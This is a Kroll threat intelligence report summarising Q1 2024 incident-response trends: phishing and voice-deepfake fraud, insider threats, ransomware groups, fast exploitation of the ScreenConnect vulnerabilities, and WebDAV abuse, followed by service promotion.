Threat Intelligence
Q4 2023 Cyber Threat Landscape Report: Threat Actors Breach the Outer Limits
by Laurie Iacono, Keith Wojcieszek, George Glass
Wed, May 22, 2024
In Q1 2024, we saw an evolution in techniques used by attackers, some of which may point to longer term trends in the variation and sophistication of attacks faced by organizations. In particular, with regards to phishing, we saw SMS and voice-based tactics being used, which raises concern around the potential for deep fakes and AI-type technologies to further enhance the effectiveness of phishing attacks.
In the same vein, one insider threat case investigated by Kroll this quarter saw employee impersonation take place, another area where AI-type technology could be especially effective. Additionally this quarter, Kroll’s investigation into the ScreenConnect CVE shows attackers getting faster in their exploitation of CVEs.
Two industries are the focus in Q1 2024: technology/telecoms and construction. The former saw significant growth in insider threat cases, potentially a result of increased supply chain risk. The latter saw steady growth in email compromise over the past year, which could be driven by the nature of work in this industry, meaning that employees are often working via mobile devices or on site, where they may be more susceptible to attack.
The sectors targeted by threat actors in Q1 2024 were consistent with previous quarters. Professional services remained the focus for attacks, accounting for 24% of cases, while manufacturing continued to rank at second place, with 13% of cases, followed by financial services and health care at 9% and 8% respectively.
Incident Response Cases in the Construction Industry Over the Past Five Quarters
Incident Response Cases in the Construction Industry Over the Past Five Quarters
In Q1 2024, attacks against the construction sector accounted for nearly 6% of all Kroll incident response engagements. This was double the sector’s peak of 3% in Q1 2023. Attacks against the construction sector are most likely to be some form of business email compromise (BEC). A review of cases indicates that carefully crafted phishing lures designed to mirror document-signing programs are a common way to socially engineer victims into giving up their credentials and, in some cases, their multi-factor authentication (MFA) prompts using an attacker-in-the-middle methodology.
Construction firms may be targeted in this way for several different purposes. One is for financial gain, as a result of social engineering campaigns that redirect vendor payments to a fraudulent bank account.
In other cases, the construction company is used as the pivot point for downstream attacks. In these cases, actors use unauthorized access to a user’s email inbox to phish other clients. For example, sending out fake requests for document signature to multiple vendors to gain credentials from those vendors and extend their victim access.
The reason for these rising attacks may be because the industry involves many digital sign-ins via mobile devices on sites. An employee may be more likely to fall for a phishing lure if they are receiving the email on the road, making them potentially less vigilant about the signs of a fraudulent email.
In Q1 2024, Kroll observed a slight increase in email compromise, with it remaining the most common type of threat incident. Interestingly, the percentage of ransomware cases declined in Q1, potentially as a result of disruptions affecting the large ransomware-as-a-service variants such as LockBit and BlackCat.
Phishing was the most likely vector for email compromise incidents. Kroll observed that in Q1, while phishing was typically synonymous with an email message, actors continued to evolve tactics and introduce others, such as SMS lures and voice phishing, which seem to be rising in popularity.
For many firms, security controls put into place to decrease the likelihood of BEC attacks include the verbal authentication of C-level personnel (such as chief executive or financial officers). Despite the fact that these were intended to add an extra layer of authentication for requests undertaken strictly through email, Kroll has observed cases in which actors are likely using commonly available deep fake tools to clone the voices of CEOs and CFOs.
In one such case, Kroll noted repeated voicemail messages simulating the CEO’s voice to authorize fraudulent transactions. The messages were upwards of five minutes long, potentially to increase the likelihood of the scam being actioned. While employees may be more suspicious of a short message cloning the CEO’s voice, a longer message—which leverages publicly available voice recordings of the CEO—arguably seems more legitimate. Such attempts highlight the increased risk that deep fakes and other AI-type technologies pose to organizations.
A review of Kroll engagements for insider threat revealed insights into the sectors most vulnerable to such attacks. In Q1, Kroll observed that cases impacting the technology/telecom sector were most likely to be insider threat cases. With most technology providers working with multiple downstream customers, an insider with access to multiple technology providers may have the ability to cascade malicious activity to clients, posing the risk of a supply chain attack.
For the first time, we also split out the proportion of insider threat engagements deemed to be intentional versus those deemed to be unintentional. In 90% of cases, Kroll observes the insider threat being intentional, and therefore arguably malicious in intent, as opposed to accidental. This highlights the importance of insider threat not being overlooked as a threat incident type by companies.
In one case observed by Kroll in Q1, an employee onboarded by a third-party contracting firm began displaying suspicious behavior. The employee, who had been given access to confidential and sensitive information due to their job role, frequently delayed communication and stopped communicating altogether once more serious questions were raised about the legitimacy of his identity.
In this case, Kroll was able to help the company identify that the employed individual was accessing the network from a different country to the one they claimed to reside in. Kroll also helped identify the data at risk associated with the employee.
Although Kroll did not observe the use of deep fake technology in enhancing the employee impersonation, this case does highlight how sophisticated AI technology could result in more convincing campaigns of this type.
The AKIRA ransomware group took the lead in Q1 2024 with 27% of cases and LOCKBIT slipped into second place with 15% of cases. We also saw a significant drop in PLAY ransomware group activity, from 11% of cases in Q4 2023 to 5% in Q1 2024.
Phishing remained the top initial access vector across all threat incident types. For events where phishing was the main initial access vector, the threat type was most likely to be email compromise.
Kroll continued to observe an increase in attacks that began with a social engineering nexus and observed increases for incidents that started with threat actors exploiting public-facing applications, such as Cisco’s Adaptive Security Appliance (ASA) virtual private networks and ScreenConnect remote management tools. Attacks targeting known vulnerabilities were most likely to result in a ransomware incident.
On February 19, software firm ConnectWise notified clients of two vulnerabilities (CVE-2024-1708 and CVE-2024-1709) impacting on-premise versions of their remote management tool, ScreenConnect (versions 23.9.7 and prior). The CVEs could allow attackers to bypass authentication measures to create administrative level accounts. Once those admin accounts are created, attackers would have system administrator level privileges.
In the immediate aftermath of the publication, Kroll responded to many engagements where attackers exploited this vulnerability to behave maliciously in victim’s networks. On the managed detection and response (MDR) side, Kroll was able to identify and quarantine exploitation activity before it progressed to a full-blown incident. In at least one case, Kroll identified a file containing a new malware, TODDLERSHARK, related to the Kimsuky threat actor group.
On the incident response side, Kroll observed that a majority of its ScreenConnect cases had an initial access date of February 21, indicating that actors were exploiting the vulnerability within less than 48 hours of the original announcement.
Based on a review of these cases, Kroll observed a wide range of threat actors leveraging the vulnerability.
In Kroll’s review, cases occurring within the first five days of the publication were more likely to be associated with larger-scale threat actor groups. Three weeks on from the publication date, fewer cases were observed, likely due to widespread patching. Cases observed during this time period were more likely to be associated with lone wolf actors or less sophisticated threat actor groups.
Kroll actively tracks malware C2 infrastructure, submissions to public sandboxes and active incident response (IR) and MDR case data to generate lists of the most active malware strains for comparison. In Q1, the most notable changes were a drop in activity from QAKBOT and PIKABOT. Kroll’s Cyber Threat Intelligence team believes that this is due to a shift in KTA248 behavior toward other malware strains, such as ICEDID and ICENOVA (LATRODECTUS).
Top 10 Malware Strains—Q1 2024
In Q1, Kroll observed an uptick in threat actors leveraging WebDAV for use with remote file access for Windows. WebDAV is a protocol that allows a standard way for users and web services to communicate over the Hypertext Transfer Protocol (HTTP) to create, modify and move documents. WebDAV offers the ability for multiple users to work simultaneously on the same content.
Kroll observed actors leveraging vulnerabilities in Microsoft SmartScreen software (CVE-2023-36025 and CVE-2024-21412) that allow attackers to send an internet shortcut with an embedded malicious URL that is designed to bypass security controls. Kroll observed multiple campaigns using the technique to distribute multiple malware variants, including TIMBERSTEALER, DARKME, DARKGATE and ICENOVA.
WebDAV has a long history of security issues, particularly when associated with Windows file-sharing technologies. Previously, we have seen issues such as the leaking of user New Technology Lan Manager (NTLM) hashes and now more recently, SmartScreen bypass vulnerabilities. These vulnerabilities aren’t the only reason WebDAV is attractive to an attacker. Due to its integration into Windows, it is harder to detect than a suspicious process making its own connections. This is because with WebDAV, it is often the case that Windows file sharing is owning the actual network interaction, and the malicious process is ostensibly accessing a file. WebDAV also provides an attacker with a simple means of remote file transfer with minimal code, as even a basic batch script can download a file with a copy command. It is recommended where possible to block WebDAV traffic at the perimeter.
One of the most effective mitigations against deepfakes and AI-type attacks is to improve detections, and security teams should have this as part of their training.
For Pre-Recorded Deepfakes
For Live Deepfakes
For AI-Enabled Deepfakes
Kroll’s findings for the first quarter of 2024 highlight the value of a broad cyber protection strategy for organizations. From familiar security foes—such as malware, to the evolution of newer ones, like deepfakes—trends observed throughout the quarter prove that cyber threats of many types are now very much the norm rather than the exception for many industries. Organizations need a cyber strategy that can guide them from building resilience to these varied threats, to threat hunting and detection, through to complete response and recovery.
The increase in insider threats noted this quarter means that businesses must ensure they are prepared to tackle the threat from within, as well as addressing increasingly varying types of external risks. At a time when vulnerabilities are exploited by attackers ranging in scale from nation states to solo actors, the threat landscape is becoming increasingly complex to navigate. As threat actors continue to leverage innovative approaches to attack, so too must organizations in response. Faced by the growing AI challenge, organizations can no longer risk relying on purely defensive or one-dimensional approaches to security. Instead, they must ensure that their vigilance translates into a strategy that proactively addresses all layers of the attack surface.
With AI, deepfake tech, SMS lures and other technology highly likely to provide even more opportunities for threat actors in the near future, companies need to be vigilant in building a comprehensive cyber protection strategy. Adapting in this climate means collaborating with a security partner capable of scaling up, with the breadth of vision and solutions to ensure that organizations can stay ahead at every stage of the threat lifecycle. Only by doing so can companies ensure they remain resilient in the face of formidable security challenges.
Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.
Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.
Kroll delivers more than a typical incident response retainer—secure a true cyber risk retainer with elite digital forensics and incident response capabilities and maximum flexibility for proactive and notification services.
Stop cyberattacks. Kroll Responder managed detection and response is fueled by seasoned IR experts and frontline threat intelligence to deliver unrivaled response.
Kroll’s Virtual CISO (vCISO) services help executives, security and technology teams safeguard information assets while supporting business operations with augmented cyber expertise to reduce business risk, signal commitment to data security and enhance overall security posture.
Validate your cyber defenses against real-world threats. Kroll’s world-class penetration testing services bring together front-line threat intelligence, thousands of hours of cyber security assessments completed each year and a team of certified cyber experts — the foundation for our sophisticated and scalable approach.
Kroll’s data breach notification, call centers and monitoring team brings global breach response expertise to efficiently manage regulatory and reputational needs.
Kroll’s ransomware preparedness assessment helps your organization avoid ransomware attacks by examining 14 crucial security areas and attack vectors.
by Laurie Iacono, Keith Wojcieszek, George Glass
by Laurie Iacono, Keith Wojcieszek, George Glass
by George Glass, Laurie Iacono, Keith Wojcieszek
by Laurie Iacono, Keith Wojcieszek, George Glass